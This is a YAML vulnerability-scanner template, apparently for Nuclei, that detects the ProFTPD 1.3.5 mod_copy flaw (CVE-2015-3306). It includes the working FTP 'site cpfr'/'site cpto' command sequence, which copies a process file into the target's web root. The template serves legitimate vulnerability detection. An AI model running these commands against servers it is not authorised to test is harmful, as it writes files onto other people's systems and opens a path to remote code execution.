50 lines
1.8 KiB
YAML
50 lines
1.8 KiB
YAML
id: CVE-2015-3306
|
|
|
|
info:
|
|
name: ProFTPd - Remote Code Execution
|
|
author: pdteam
|
|
severity: critical
|
|
description: ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.
|
|
impact: |
|
|
Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code with the privileges of the ProFTPd process.
|
|
remediation: Upgrade to ProFTPD 1.3.5a / 1.3.6rc1 or later.
|
|
reference:
|
|
- https://github.com/t0kx/exploit-CVE-2015-3306
|
|
- https://www.exploit-db.com/exploits/36803/
|
|
- http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157053.html
|
|
- http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157054.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-3306
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
|
|
cvss-score: 10
|
|
cve-id: CVE-2015-3306
|
|
cwe-id: CWE-284
|
|
cpe: cpe:2.3:a:proftpd:proftpd:1.3.5:*:*:*:*:*:*:*
|
|
epss-score: 0.97267
|
|
metadata:
|
|
max-request: 1
|
|
product: proftpd
|
|
vendor: proftpd
|
|
tags: cve,cve2015,ftp,rce,network,proftpd,edb
|
|
tcp:
|
|
- host:
|
|
- "{{Hostname}}"
|
|
port: 21
|
|
inputs:
|
|
- data: "site cpfr /proc/self/cmdline\r\n"
|
|
read: 1024
|
|
|
|
- data: "site cpto /tmp/.{{randstr}}\r\n"
|
|
read: 1024
|
|
|
|
- data: "site cpfr /tmp/.{{randstr}}\r\n"
|
|
read: 1024
|
|
|
|
- data: "site cpto /var/www/html/{{randstr}}\r\n"
|
|
read-size: 1024
|
|
matchers:
|
|
- type: word
|
|
part: raw
|
|
words:
|
|
- "Copy successful"
|
|
# digest: 4b0a00483046022100d6ac5dfea8da9853cbc6fe55a2803f210dc06a967262d008e362d35db82907f4022100e6c3e3ad827d5668b421453cd0861f508c789f00b2c5407f6eff69978b038fd4:922c64590222798bb761d5b6d8e72950 |